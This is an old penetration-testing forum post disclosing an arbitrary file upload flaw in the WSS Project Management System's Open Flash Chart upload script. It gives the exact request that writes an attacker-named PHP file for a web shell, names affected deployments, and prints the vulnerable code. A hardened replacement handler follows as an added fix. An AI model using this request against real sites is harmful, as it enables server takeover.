中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: WSS Project Management System POST get shell

Author: admin    Time: 2013-2-23 12:38
Title: WSS Project Management System POST get shell
The vulnerable file takes POST data and saves it as a file with an arbitrary extension.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php  (hfy.php is the file name)

POST arbitrary data.
Saved at: http://localhost/chart/tmp-upload-images/hfy.php

The latest WSS version has this vulnerable file, even the paid edition; the demo deployed on the Sina app store has it too.
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//


// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}


?>
Fix:
This vulnerable file is just a tragedy. How to fix it: add permission checks, extension checks and the like. Do it yourself.
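One way to apply the fixes the post recommends, written here as an added example (not the WSS or Open Flash Chart code): the handler requires an authenticated session, accepts only a real multipart upload, validates the bytes as PNG/JPEG/GIF, and lets the server choose a random filename with a whitelisted extension instead of trusting $_GET['name'] or a raw POST body. The is_chart_user_authenticated() function is an assumed placeholder for the application's own session check.

```php
<?php
// Added hardened replacement for ofc_upload_image.php (example, not project code).
function is_chart_user_authenticated(): bool {
    // Placeholder hook: wire this to the application's real session/ACL check.
    return isset($_SESSION['user_id']);
}
function save_chart_image(array $file, string $upload_dir): string {
    // 1. Accept only a real multipart upload; never write a raw POST body,
    //    and never let the caller pick the destination via $_GET['name'].
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no uploaded file');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }
    // 2. Validate content, not the client-supplied name: the bytes must parse
    //    as PNG/JPEG/GIF and the libmagic MIME type must agree.
    $info = @getimagesize($file['tmp_name']);
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];
    if ($info === false || !isset($allowed[$info[2]])) {
        throw new RuntimeException('not an allowed image type');
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $info['mime']) {
        throw new RuntimeException('MIME mismatch');
    }
    // 3. The server chooses the filename: random, with a whitelisted extension.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $dest = rtrim($upload_dir, '/') . '/' . $name;
    if (!is_dir($upload_dir) && !mkdir($upload_dir, 0750, true)) {
        throw new RuntimeException('cannot create upload dir');
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0640); // not executable, not world-writable
    return $name;
}
session_start();
if (!is_chart_user_authenticated()) {
    http_response_code(403); exit('forbidden');
}
try {
    $saved = save_chart_image($_FILES['Filedata'] ?? [], '../tmp-upload-images');
    echo 'Saved as ' . htmlspecialchars($saved);
} catch (RuntimeException $e) {
    http_response_code(400); echo 'Upload rejected';
}
```

Pair this with a web-server rule that disables script execution inside tmp-upload-images, so that even a validation bypass cannot yield code execution.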





Welcome to 中国网络渗透测试联盟 (China Network Penetration Testing Alliance, https://www.cobjon.com/) Powered by Discuz! X3.2